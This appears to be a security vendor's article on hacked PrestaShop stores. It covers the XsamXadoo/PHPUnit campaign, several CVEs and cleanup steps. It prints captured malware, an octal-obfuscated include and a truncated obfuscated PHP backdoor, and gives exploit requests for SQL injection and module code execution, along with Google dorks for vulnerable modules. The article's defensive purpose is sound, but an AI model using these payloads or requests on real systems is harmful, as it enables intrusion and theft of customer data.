In the past, PrestaShop has undergone various hack attempts. E-commerce security bears great significance because a breach translates directly into lost revenue. In the past couple of years the use of e-commerce platforms has grown rapidly, and the number of PrestaShop hacks has grown with it.
It has become imperative for store owners to spend more time and money on PrestaShop security. In this article you will learn why PrestaShop sites keep getting hacked, which vulnerabilities are present in PrestaShop, how to clean up a hacked PrestaShop site, and much more.
In 2020, PrestaShop disclosed a malware campaign named XsamXadoo Bot. Let us first discuss this malware in detail.
A couple of days back, PrestaShop (an open-source E-commerce solution) shared particulars about a potential threat of a malware known as XsamXadoo on its stores.
Using this malware, the hacker gets easy access to your PrestaShop store. Many store owners on this popular e-commerce platform have reportedly already fallen prey to it. The malware abuses a known vulnerability in a PHP tool (PHPUnit), tracked as CVE-2017-9841.
Read on for more details about this malware and how you can remove it. We will also share the steps you should follow to check your stores for the vulnerability.
Is your Prestashop Hacked? Get in touch with us and we’d be happy to assist you. Secure your Prestashop now.
Here is a list of known malicious files that may indicate a compromised shop:
To check if Core PrestaShop files have been modified > look at the “List of changed files” section at the bottom of the “Advanced Parameters > Information” page in your Back Office.
As discussed above, the vulnerability lies in the PHP tool PHPUnit and is identified as CVE-2017-9841. It affects the file "Util/PHP/eval-stdin.php" inside the PHPUnit folder.
If your store or one of its modules ships PHPUnit versions before 4.8.28, or 5.x versions before 5.6.3, it is exposed to this vulnerability.
We came across a number of forums where people ask questions such as
If you are skeptical about whether or not your store is vulnerable to the attack, you should do the following things to get rid of all your doubts –
You don't need to worry, as checking your store for this risk is like shooting fish in a barrel. Just follow the steps below –
Connect via FTP or shell access > look at the "vendor" directory inside each module folder of your PrestaShop installation:
If there's a directory called "phpunit" inside any of those vendor directories, your shop might be hacked.
Warning: don't touch anything else or you might break your shop. Other files and folders (e.g. /vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit/ or .xml files) are safe, do not delete them.
Now, at this stage, two cases may arise.
If the folder is there, you are at risk. First and foremost, you need to delete the PHPUnit folder. Rest assured, deleting the PHPUnit folder won't affect the functioning of your website. This removes the component that the XsamXadoo malware exploits and so reduces the risk to your store.
Go ahead and repeat the same process from the beginning for all your modules, i.e. search, find and delete the PHPUnit folder, and save your store from this critical security vulnerability in PrestaShop modules.
Congratulations, you don’t need to worry as you are safe. However, if you want you can still choose to go one step ahead and secure your PrestaShop Store with the best possible security measures.
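As an added example (not from the original article), a small POSIX shell script that automates the check above: it lists every directory literally named "phpunit" that sits directly under a vendor folder, and separately reports any eval-stdin.php file under such a folder, which is the file CVE-2017-9841 targets. The shop root is passed as an argument; the demo tree at the bottom is constructed and is not a real shop.

```shell
#!/bin/sh
# Added example: find PHPUnit directories shipped inside a PrestaShop tree.
# Pass the shop root as the first argument. Only directories named exactly
# "phpunit" directly under a "vendor" directory are reported, so the safe
# Symfony bridge (vendor/symfony/.../Bridge/PhpUnit) is not matched.
find_phpunit_dirs() {
    find "$1" -type d -path '*/vendor/phpunit' 2>/dev/null | sort
}

# Report the specific file that CVE-2017-9841 abuses, wherever it sits
# below a vendor/phpunit directory.
find_eval_stdin() {
    find "$1" -type f -path '*/vendor/phpunit/*' -name 'eval-stdin.php' 2>/dev/null | sort
}

# Constructed demo tree (hypothetical module names, not a real shop).
demo="$(mktemp -d)"
mkdir -p "$demo/modules/examplemod/vendor/phpunit/phpunit/src/Util/PHP"
: > "$demo/modules/examplemod/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
mkdir -p "$demo/modules/cleanmod/vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit"
mkdir -p "$demo/vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit"

echo "phpunit directories found:"
find_phpunit_dirs "$demo"        # only modules/examplemod/vendor/phpunit
echo "eval-stdin.php files found:"
find_eval_stdin "$demo"          # the one file inside that directory
rm -rf "$demo"
```

Run it as sh check.sh /path/to/prestashop; an empty listing for both sections is the "safe" case described above.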
NOTE: You can also scan your site with an online PrestaShop exploit or vulnerability scanner.
Before you fix a hacked PrestaShop store, you should know the symptoms of a PrestaShop hack –
Here’s an example:
home/i***/public_html/fractals**.com/css/index.php
<?php /*301f7*/ @include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o"; /*301f7*/
/*
 * 2007-2017 PrestaShop
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@prestashop.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
 * versions in the future. If you wish to customize PrestaShop for your
 * needs please refer to http://www.prestashop.com for more information.
 *
 * @author PrestaShop SA <contact@prestashop.com>
 * @copyright 2007-2017 PrestaShop SA
 * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
 * International Registered Trademark & Property of PrestaShop SA
 */
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
header("Location: ../");
exit;
You can also see a randomly named .php file inserted in the same directory (see image below),
which contains the following code:
<?php $scgcwgc = '23p61vsfr-8#*ae0oy_uxHt594ck\'gmdil7nb';$nocgph = Array();$nocgph[] = $scgcwgc[21].$scgcwgc[12];$nocgph[] = $scgcwgc[11];$nocgph[] = $scgcwgc[15].$scgcwgc[31].$scgcwgc[7].$scgcwgc[23].$scgcwgc[1].$scgcwgc[31].$scgcwgc[23].$scgcwgc[1].$scgcwgc[9].$scgcwgc[23].$scgcwgc[15].$scgcwgc[31].$scgcwgc[13].$scgcwgc[9].$scgcwgc[25].$scgcwgc[31].$scgcwgc[26].$scgcwgc[3].$scgcwgc[9].$scgcwgc[13].$scgcwgc[34].$scgcwgc[31].$scgcwgc[26].$scgcwgc[9].$scgcwgc[0].$scgcwgc[24].$scgcwgc[3].$scgcwgc[36].$scgcwgc[15].$scgcwgc[15].$scgcwgc[26].$scgcwgc[10].$scgcwgc[0].$scgcwgc[34].$scgcwgc[0].$scgcwgc[4];$nocgph[] = $scgcwgc[26].$scgcwgc[16].$scgcwgc[19].$scgcwgc[35].$scgcwgc[22];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[18].$scgcwgc[8].$scgcwgc[14].$scgcwgc[2].$scgcwgc[14].$scgcwgc[13].$scgcwgc[22];$nocgph[] = $scgcwgc[14].$scgcwgc[20].$scgcwgc[2].$scgcwgc[33].$scgcwgc[16].$scgcwgc[31].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[19].$scgcwgc[36].$scgcwgc[6].$scgcwgc[22].$scgcwgc[8];$nocgph[] = $scgcwgc[13].$scgcwgc[8].$scgcwgc[8].$scgcwgc[13].$scgcwgc[17].$scgcwgc[18].$scgcwgc[30].$scgcwgc[14].$scgcwgc[8].$scgcwgc[29].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[33].$scgcwgc[14].$scgcwgc[35];$nocgph[] = $scgcwgc[2].$scgcwgc[13].$scgcwgc[26].$scgcwgc[27];foreach ($nocgph[7]($_COOKIE, $_POST) as $tmqgiuw => $xienbb){function paloe($nocgph, $tmqgiuw, $duopzf){return $nocgph[6]($nocgph[4]($tmqgiuw . $nocgph[2], ($duopzf / $nocgph[8]($tmqgiuw)) + 1), 0, $duopzf);}function tsqylud($nocgph, $anjcq){return @$nocgph[9]($nocgph[0], $anjcq);}function pslmija($nocgph, $anjcq){$pqbygpl =
At times, you may notice that the index.php files contain a line like
@include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o";
Notice that the path, once the octal escapes are decoded, ends in an .ico file. This file is the source of the problem and must be removed.
Possible causes of a PrestaShop exploit are as follows –
In PrestaShop, one of the common vulnerabilities is SQL injection, or malicious code injection. Since it deals with the database, it is serious. It occurs when unsanitized input is placed in a query: the DBMS executes the attacker-controlled query, disclosing key details.
The cause was first reported in 2014. The issue was detected in the parameter id_manufacturer.
http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection]
The request above passes unsanitized input through id_manufacturer. This makes it easy for the hacker to read the database and compromise the security of the PrestaShop store. Additionally, the hacker can automate the exploitation using tools such as Sqlninja, Sqlmap, etc.
Of late, a new PrestaShop SQL injection has been discovered. The E-commerce solution version (1.5.5.0 – 1.7.2.5) was found to suffer from this vulnerability and it was known as CVE-2018-8824. This was caused by the module known as Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro. So, if you have downloaded this module, you need to update it right away.
GET: http://site/modules/bamegamenu/ajax_phpcode.php?code=p(Db::getInstance()- >ExecuteS("show tables"));
With this request, data is fetched through the AJAX endpoint using the vulnerable parameter, and the response lists the tables present in the database.
Replacing the statement "show tables" with any other statement runs that statement instead, so any database operation can be performed. This makes it easy for the hacker to go through the sensitive tables.
Those tables hold login details, so once they are read PrestaShop's security is breached and the dashboard can easily be taken over.
This is one of the serious security issues of PrestaShop. This issue occurs when a user having lower privileges is provided higher privileges. This issue for PrestaShop was discovered in 2011 and the latest one was discovered in 2018.
All PrestaShop versions below 1.6.1.19 suffered from this issue. This vulnerability was known as CVE-2018-13784. The key fault behind it is the buggy encryption of the user cookie. PrestaShop uses Blowfish/ECB or AES encryption through openssl_encrypt(), which makes it prone to padding oracle attacks.
As a result, the hacker gets an easy opportunity to both read and write the contents of a PrestaShop cookie, and so can present a cookie that was not issued to them, leading to privilege escalation. The hacker can –
The whole process where the cookies are being issued takes place in ./classes/Cookie.php.
When you run PrestaShop alongside a WordPress installation, you will come across compatibility issues more often. WordPress updates itself to the latest version automatically, which is in itself a sensible practice. The problem lies in what happens when an update fails, as the process below shows.
WordPress Failed Update Process –
Step 1 – Try to update.
During the update, WordPress moves and edits its files.
Step 2 – Update failed.
When the update fails, WordPress makes a copy of wp-config.php.
Step 3 – Exit.
The copy is saved as a text file on the server.
The above looks fine at first glance, but it is not: a .txt copy of wp-config.php has been created by WordPress. The server now holds the sensitive details of the PrestaShop database in a plain text file, and special scanners exist that look for exactly such files. From there the hacker can go ahead and conduct a PrestaShop hack. This is the outcome of a faulty WordPress installation.
The sole source of this hack is buggy coding. Through it, the hacker can run code on your system remotely and leave your server compromised. A remote code execution vulnerability was discovered in PrestaShop, named CVE-2018-8823, in the Responsive Mega Menu Pro module.
The main cause was a function in the file modules/bamegamenu/ajax_phpcode.php that runs code supplied in the request parameters. The code can be run remotely simply by changing the parameters, and no authentication is required to exploit it.
A default username such as 'admin' can be enough to compromise a company. People tend to overlook default installation settings. Make sure that no installation keeps a default password, and that the root directory is not visible on the internet, as it may leak installation files.
At times proper checks and balances are not implemented, and PrestaShop ends up allowing specially crafted files to be uploaded. This is a serious issue, as it may compromise your website as well.
What's worse, it can be used to install malware on your system. Furthermore, there is no dearth of Google dorks that find vulnerable files in bulk. For instance –
inurl:”/modules/columnadverts2/”
or
inurl:”/modules/columnadverts/”
Vulnerable PrestaShop servers can be found with a simple Google search for these terms, and faulty coding cannot always be blamed: you might have set faulty permissions.
You must have heard about cross-site scripting (XSS). It is one of the most common vulnerabilities. After a successful XSS attack, you may face the following situations –
In this black hat SEO method, the hacker hijacks the search engine results of your website. Search engine crawlers (Googlebot, Bingbot) will index your site as if it were Japanese-language or pharma-related content. You can familiarise yourself with the Japanese keywords hack or the WordPress pharma hack by typing the query below into Google –
Site:example.com or Site:example.com japan or Site:example.com Viagra
Pharma Spam –
If your PrestaShop store is hacked, you can follow the cleanup measures below –
The first step is to block access to all the important folders. You can do this by creating a .htaccess file inside each folder containing –
Order Deny,Allow
Deny from all
Allow from 22.33.44.55
The above code denies access to the file/folder. 'Allow from 22.33.44.55' means that you are permitting access only to that particular IP; you can also add a range of IPs. Note that Order, Deny and Allow are the Apache 2.2 syntax; on Apache 2.4 they only work with mod_access_compat loaded, and the native equivalent is "Require all denied" followed by "Require ip 22.33.44.55". You may want to review your existing .htaccess files as well: in the case of a PrestaShop hack, you must clean them first.
You have to ensure that the files have correct permissions. Files should be 644 (rw-r--r--) and directories 755 (rwxr-xr-x). They must be set correctly, as this prevents misuse of file access.
In the past, there have been instances where vulnerable modules were responsible for a PrestaShop hack. Check for buggy or outdated modules, and either update them or get rid of them.
The cleanup process also involves encrypting login values in the admin tables. This provides a second layer of protection in case your important data gets compromised. Besides, other applications installed on the same server should use a separate database.
It is imperative to have strong FTP and login credentials. Avoid using common phrases and words.
Hackers across the globe do their best to hide their code, using encodings that are not easily readable by the human eye. So you may want to look for code hidden in base64 format. Finding it manually is a cumbersome task; the following command will do the trick for you –
find . -name "*.php" -exec grep -l "base64" '{}' \; -print &> fewfwd.txt
The above-mentioned code will search for base64 code and save it inside fewfwd.txt. After analyzing this, you may want to look out for the below-mentioned redirecting domains –
<li><a href="frefre-domain.com">Something1</a></li>
To look out for suspicious domains, you can have a look in the file fewfwd.txt.
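As an added example (not from the original article), a POSIX shell script that automates the two checks above: it decodes the octal-escaped path of an injected @include so you can see which file it loads, and it scans every .php file under a root for includes written with octal escapes or for base64_decode/gzinflate/eval. The sample files it creates are constructed, not taken from a real compromise.

```shell
#!/bin/sh
# Added example: decode an octal-escaped PHP include path and scan a tree.

# Decode PHP double-quoted octal escapes ("\057hom\145" -> "/home").
# sed rewrites every \nnn as \0nnn, the form that printf %b understands
# in both POSIX sh and bash.
decode_php_octal() {
    esc="$(printf '%s' "$1" | sed 's/\\\([0-7]\{3\}\)/\\0\1/g')"
    printf '%b\n' "$esc"
}

# Print "<indicator> <file>" for each .php file under $1 that shows one of
# the symptoms described above. Callers count the lines; nothing is deleted.
scan_suspicious_php() {
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        # include/require whose argument is written with octal escapes
        if grep -qE '(include|require)(_once)?[^;]*\\[0-7]{3}' "$f"; then
            echo "octal-include $f"
        fi
        # classic decoders used by obfuscated loaders
        if grep -qE 'base64_decode|gzinflate|eval\(' "$f"; then
            echo "encoded-payload $f"
        fi
    done
}

# Constructed demo tree: an injected index.php, a base64 loader, a clean file.
demo="$(mktemp -d)"
mkdir -p "$demo/css" "$demo/modules/clean"
printf '%s\n' '<?php @include "\057var\057www\057shop\057classes\057module\057.abc.i\143o"; header("Location: ../"); exit;' > "$demo/css/index.php"
printf '%s\n' '<?php /* constructed sample */ $s = base64_decode("aGVsbG8=");' > "$demo/css/qwerty.php"
printf '%s\n' '<?php echo "hello";' > "$demo/modules/clean/index.php"

scan_suspicious_php "$demo"   # reports css/index.php and css/qwerty.php only
decode_php_octal '\057var\057www\057shop\057classes\057module\057.abc.i\143o'
rm -rf "$demo"
```

Feed the decoded path into your own review rather than deleting blindly; legitimate PrestaShop code also calls base64_decode, so the "encoded-payload" lines are leads, not verdicts.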
Make sure you have taken a backup of all your files and update it at regular intervals. Install fresh copies only from the official website.
If you want to avoid a PrestaShop hack, use a firewall. With a firewall you will be able to keep unauthorized users at bay. You can choose from a plethora of firewalls available on the market; some are free and some are easy on the pocket. You also have the option of using a module for this purpose.
If you have found the PHPUnit folder in your store, make sure you delete it. But even after this, how can you be sure that your store was not compromised?
Well, have a look at your store for the following symptoms –
What happens if my store is already infected? Through this vulnerability the hacker gets easy access to your website and can, for instance, easily steal customers' details. If you find recent files in your store with the following names, your website is compromised –
The best remedy is to restore a backup from before the date of infection and then look for the PHPUnit folder. Otherwise, it will become necessary to –
If you are eyeing to control the damage as soon as possible, you need to act fast.
One of the most efficient and reliable methods is to take expert help. Avoid the trial and error of a do-it-yourself malware cleanup. Relax and follow the steps discussed below –
Our experts are already aware of this vulnerability and have already secured numerous websites and e-commerce stores. They will perform a complete check of the various modules from PrestaShop Addons to look for the vulnerable PHPUnit folder.
If you have queries or doubts about your PrestaShop website, reach out to us. We will be happy to lend a helping hand in protecting and monitoring your PrestaShop website.
Wrap Up
In a short period, PrestaShop stores have encountered massive malware attacks. Unless you take prompt action, you may end up with a hacked PrestaShop store.
For advanced security, make sure you implement the best security measures in your store.